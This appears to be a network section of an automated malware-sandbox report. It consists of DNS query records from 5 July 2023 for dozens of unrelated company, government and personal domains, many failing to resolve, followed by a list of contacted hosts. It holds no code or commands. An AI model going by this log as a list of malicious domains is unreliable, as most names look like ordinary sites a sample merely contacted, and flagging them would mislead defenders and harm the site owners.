                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.124602079 CEST8.8.8.8192.168.2.60x7863No error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.133837938 CEST8.8.8.8192.168.2.60x4023Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.371370077 CEST8.8.8.8192.168.2.60xe255No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.395972013 CEST8.8.8.8192.168.2.60x4e5No error (0)bount.com.tw188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.395972013 CEST8.8.8.8192.168.2.60x4e5No error (0)bount.com.tw188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.396137953 CEST8.8.8.8192.168.2.60x82dbName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.421191931 CEST8.8.8.8192.168.2.60xc66dName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.441625118 CEST8.8.8.8192.168.2.60x6655Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.466687918 CEST8.8.8.8192.168.2.60x36eeName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.486895084 CEST8.8.8.8192.168.2.60x9c24Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.504218102 CEST8.8.8.8192.168.2.60x205bNo error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.504542112 CEST8.8.8.8192.168.2.60xa082No error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.504542112 CEST8.8.8.8192.168.2.60xa082No error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.535202026 CEST8.8.8.8192.168.2.60xcc08No error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.535202026 CEST8.8.8.8192.168.2.60xcc08No error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.559345007 CEST8.8.8.8192.168.2.60x4bd8Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.562582970 CEST8.8.8.8192.168.2.60x7f54No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.565133095 CEST8.8.8.8192.168.2.60xe97Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.595438004 CEST8.8.8.8192.168.2.60x191fName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.608755112 CEST8.8.8.8192.168.2.60x2093No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.608755112 CEST8.8.8.8192.168.2.60x2093No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.608755112 CEST8.8.8.8192.168.2.60x2093No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.608755112 CEST8.8.8.8192.168.2.60x2093No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.655493975 CEST8.8.8.8192.168.2.60xeb1fServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.698668003 CEST8.8.8.8192.168.2.60x909dNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.811225891 CEST8.8.8.8192.168.2.60xa8a4Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.831073046 CEST8.8.8.8192.168.2.60xd8b5No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.835396051 CEST8.8.8.8192.168.2.60xc70fServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.841329098 CEST8.8.8.8192.168.2.60x47d1Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.875029087 CEST8.8.8.8192.168.2.60x642Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.880717993 CEST8.8.8.8192.168.2.60xfb6eNo error (0)603888.comnum6.17986.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.880717993 CEST8.8.8.8192.168.2.60xfb6eNo error (0)num6.17986.net67.21.93.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.896482944 CEST8.8.8.8192.168.2.60x5179No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.925148964 CEST8.8.8.8192.168.2.60x27d5Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.943572998 CEST8.8.8.8192.168.2.60x8572No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.964946985 CEST8.8.8.8192.168.2.60x2b74Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.039001942 CEST8.8.8.8192.168.2.60x3c3bName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.126060009 CEST8.8.8.8192.168.2.60xcdbfName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.173218012 CEST8.8.8.8192.168.2.60x7cf3Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.176575899 CEST8.8.8.8192.168.2.60xf994No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.177900076 CEST8.8.8.8192.168.2.60xcd50Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.242547035 CEST8.8.8.8192.168.2.60x5093No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.246195078 CEST8.8.8.8192.168.2.60x58dbNo error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.246195078 CEST8.8.8.8192.168.2.60x58dbNo error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.337234974 CEST8.8.8.8192.168.2.60xaa5aServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.576668978 CEST8.8.8.8192.168.2.60xb767Server failure (2)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.751754999 CEST8.8.8.8192.168.2.60xc369No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.775495052 CEST8.8.8.8192.168.2.60x738dNo error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.779663086 CEST8.8.8.8192.168.2.60xaf08No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.833528996 CEST8.8.8.8192.168.2.60xc70fServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.866208076 CEST8.8.8.8192.168.2.60x77b2No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.886934996 CEST8.8.8.8192.168.2.60xae15No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.886934996 CEST8.8.8.8192.168.2.60xae15No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.886934996 CEST8.8.8.8192.168.2.60xae15No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.886934996 CEST8.8.8.8192.168.2.60xae15No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.942868948 CEST8.8.8.8192.168.2.60xb6acNo error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.942868948 CEST8.8.8.8192.168.2.60xb6acNo error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.950692892 CEST8.8.8.8192.168.2.60x368Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.958697081 CEST8.8.8.8192.168.2.60xd942No error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:11.964735985 CEST8.8.8.8192.168.2.60x2b74Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.089986086 CEST8.8.8.8192.168.2.60xd01aName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.109704971 CEST8.8.8.8192.168.2.60xeccaServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.118455887 CEST8.8.8.8192.168.2.60x292bName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.182518959 CEST8.8.8.8192.168.2.60x7ccfName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.206362009 CEST8.8.8.8192.168.2.60x3a09No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.206362009 CEST8.8.8.8192.168.2.60x3a09No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.206362009 CEST8.8.8.8192.168.2.60x3a09No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.225091934 CEST8.8.8.8192.168.2.60xc13fServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.253459930 CEST8.8.8.8192.168.2.60xbb2eServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.267841101 CEST8.8.8.8192.168.2.60xc570Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.389796972 CEST8.8.8.8192.168.2.60xb42cServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.574254990 CEST8.8.8.8192.168.2.60xb767Server failure (2)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.684897900 CEST8.8.8.8192.168.2.60x72e4Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:12.854095936 CEST8.8.8.8192.168.2.60xc70fServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.273330927 CEST8.8.8.8192.168.2.60xaa37No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.286952972 CEST8.8.8.8192.168.2.60x7704Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.309267998 CEST8.8.8.8192.168.2.60x7f92Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.313595057 CEST8.8.8.8192.168.2.60x17e0No error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.313595057 CEST8.8.8.8192.168.2.60x17e0No error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.364325047 CEST8.8.8.8192.168.2.60x9369Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.383881092 CEST8.8.8.8192.168.2.60x82dfNo error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.383881092 CEST8.8.8.8192.168.2.60x82dfNo error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.395886898 CEST8.8.8.8192.168.2.60xd659Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.405791998 CEST8.8.8.8192.168.2.60xe85cNo error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.405791998 CEST8.8.8.8192.168.2.60xe85cNo error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.405791998 CEST8.8.8.8192.168.2.60xe85cNo error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.405791998 CEST8.8.8.8192.168.2.60xe85cNo error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.419434071 CEST8.8.8.8192.168.2.60x60acName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.422811985 CEST8.8.8.8192.168.2.60x5567No error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.436342955 CEST8.8.8.8192.168.2.60xf5c0Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.441031933 CEST8.8.8.8192.168.2.60x61d1Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.441745043 CEST8.8.8.8192.168.2.60xa198No error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.472348928 CEST8.8.8.8192.168.2.60x43eeNo error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.481929064 CEST8.8.8.8192.168.2.60x5744Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.494128942 CEST8.8.8.8192.168.2.60xbb75No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.507096052 CEST8.8.8.8192.168.2.60xaf4Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.518800020 CEST8.8.8.8192.168.2.60x66a8Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.525362015 CEST8.8.8.8192.168.2.60xbf9bNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.536463022 CEST8.8.8.8192.168.2.60xa737No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.596297979 CEST8.8.8.8192.168.2.60xb965No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.746274948 CEST8.8.8.8192.168.2.60x2daeServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.754272938 CEST8.8.8.8192.168.2.60x4208No error (0)bount.com.tw188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.754272938 CEST8.8.8.8192.168.2.60x4208No error (0)bount.com.tw188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.802916050 CEST8.8.8.8192.168.2.60x3f4dServer failure (2)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:13.983619928 CEST8.8.8.8192.168.2.60x2b74Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.281588078 CEST8.8.8.8192.168.2.60x2dc1No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.462776899 CEST8.8.8.8192.168.2.60xcd73Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.480484009 CEST8.8.8.8192.168.2.60xb612No error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.540901899 CEST8.8.8.8192.168.2.60xc945Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.564868927 CEST8.8.8.8192.168.2.60x9e39Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.619997978 CEST8.8.8.8192.168.2.60x54e5No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.619997978 CEST8.8.8.8192.168.2.60x54e5No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.722477913 CEST8.8.8.8192.168.2.60x33beServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.731828928 CEST8.8.8.8192.168.2.60xf34cServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.737278938 CEST8.8.8.8192.168.2.60x761cNo error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.763014078 CEST8.8.8.8192.168.2.60x2d2aName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.768789053 CEST8.8.8.8192.168.2.60x7e2aServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.830069065 CEST8.8.8.8192.168.2.60x681cServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.892286062 CEST8.8.8.8192.168.2.60x8a7No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.892286062 CEST8.8.8.8192.168.2.60x8a7No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.894326925 CEST8.8.8.8192.168.2.60xc70fServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.900279999 CEST8.8.8.8192.168.2.60x8147Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.930129051 CEST8.8.8.8192.168.2.60x8f46No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.962462902 CEST8.8.8.8192.168.2.60x7097No error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:14.983834028 CEST8.8.8.8192.168.2.60xd76eServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.022922993 CEST8.8.8.8192.168.2.60xd487No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.022922993 CEST8.8.8.8192.168.2.60xd487No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.055996895 CEST8.8.8.8192.168.2.60x25baNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.055996895 CEST8.8.8.8192.168.2.60x25baNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.067332029 CEST8.8.8.8192.168.2.60xc33dNo error (0)araax.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.067332029 CEST8.8.8.8192.168.2.60xc33dNo error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.067332029 CEST8.8.8.8192.168.2.60xc33dNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.067332029 CEST8.8.8.8192.168.2.60xc33dNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.147732019 CEST8.8.8.8192.168.2.60xb34eNo error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.322458029 CEST8.8.8.8192.168.2.60x84b8No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.322458029 CEST8.8.8.8192.168.2.60x84b8No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.322458029 CEST8.8.8.8192.168.2.60x84b8No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.381237984 CEST8.8.8.8192.168.2.60x31b9No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.398284912 CEST8.8.8.8192.168.2.60x417cNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.598021984 CEST8.8.8.8192.168.2.60x1e4Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.643850088 CEST8.8.8.8192.168.2.60x7e36No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.661560059 CEST8.8.8.8192.168.2.60x43f7No error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.661560059 CEST8.8.8.8192.168.2.60x43f7No error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.676568985 CEST8.8.8.8192.168.2.60x80b6No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.733794928 CEST8.8.8.8192.168.2.60x3738Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.932991028 CEST8.8.8.8192.168.2.60x781eServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.942259073 CEST8.8.8.8192.168.2.60xcf96Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.961380959 CEST8.8.8.8192.168.2.60xf0eaNo error (0)anduran.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.961380959 CEST8.8.8.8192.168.2.60xf0eaNo error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.961380959 CEST8.8.8.8192.168.2.60xf0eaNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.961380959 CEST8.8.8.8192.168.2.60xf0eaNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:15.997957945 CEST8.8.8.8192.168.2.60x6b1No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          • techtrans.de
                                                                                                                                                                                                                                                                          • www.muhr-soehne.de
                                                                                                                                                                                                                                                                          • clinicasanluis.com.co
                                                                                                                                                                                                                                                                          • ldh.la.gov
                                                                                                                                                                                                                                                                          • orlyhotel.com
                                                                                                                                                                                                                                                                          • diamir.de
                                                                                                                                                                                                                                                                          • flamingorecordings.com
                                                                                                                                                                                                                                                                          • pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                          • dataform.co.uk
                                                                                                                                                                                                                                                                          • www.diamir.de
                                                                                                                                                                                                                                                                          • hyab.se
                                                                                                                                                                                                                                                                          • nts-web.net
                                                                                                                                                                                                                                                                          • hyab.com
                                                                                                                                                                                                                                                                          • www.jenco.co.uk
                                                                                                                                                                                                                                                                          • www.olras.com
                                                                                                                                                                                                                                                                          • www.quadlock.com
                                                                                                                                                                                                                                                                          • www.baijaku.com
                                                                                                                                                                                                                                                                          • www.pdqhomes.com
                                                                                                                                                                                                                                                                          • www.item-pr.com
                                                                                                                                                                                                                                                                          • www.alteor.cl
                                                                                                                                                                                                                                                                          • www.pr-park.com
                                                                                                                                                                                                                                                                          • www.depalo.com
                                                                                                                                                                                                                                                                          • www.nunomira.com
                                                                                                                                                                                                                                                                          • www.credo.edu.pl
                                                                                                                                                                                                                                                                          • www.transsib.com
                                                                                                                                                                                                                                                                          • www.otena.com
                                                                                                                                                                                                                                                                          • www.tvtools.fi
                                                                                                                                                                                                                                                                          • www.abart.pl
                                                                                                                                                                                                                                                                          • www.petsfan.com
                                                                                                                                                                                                                                                                          • www.evcpa.com
                                                                                                                                                                                                                                                                          • www.vexcom.com
                                                                                                                                                                                                                                                                          • www.naoi-a.com
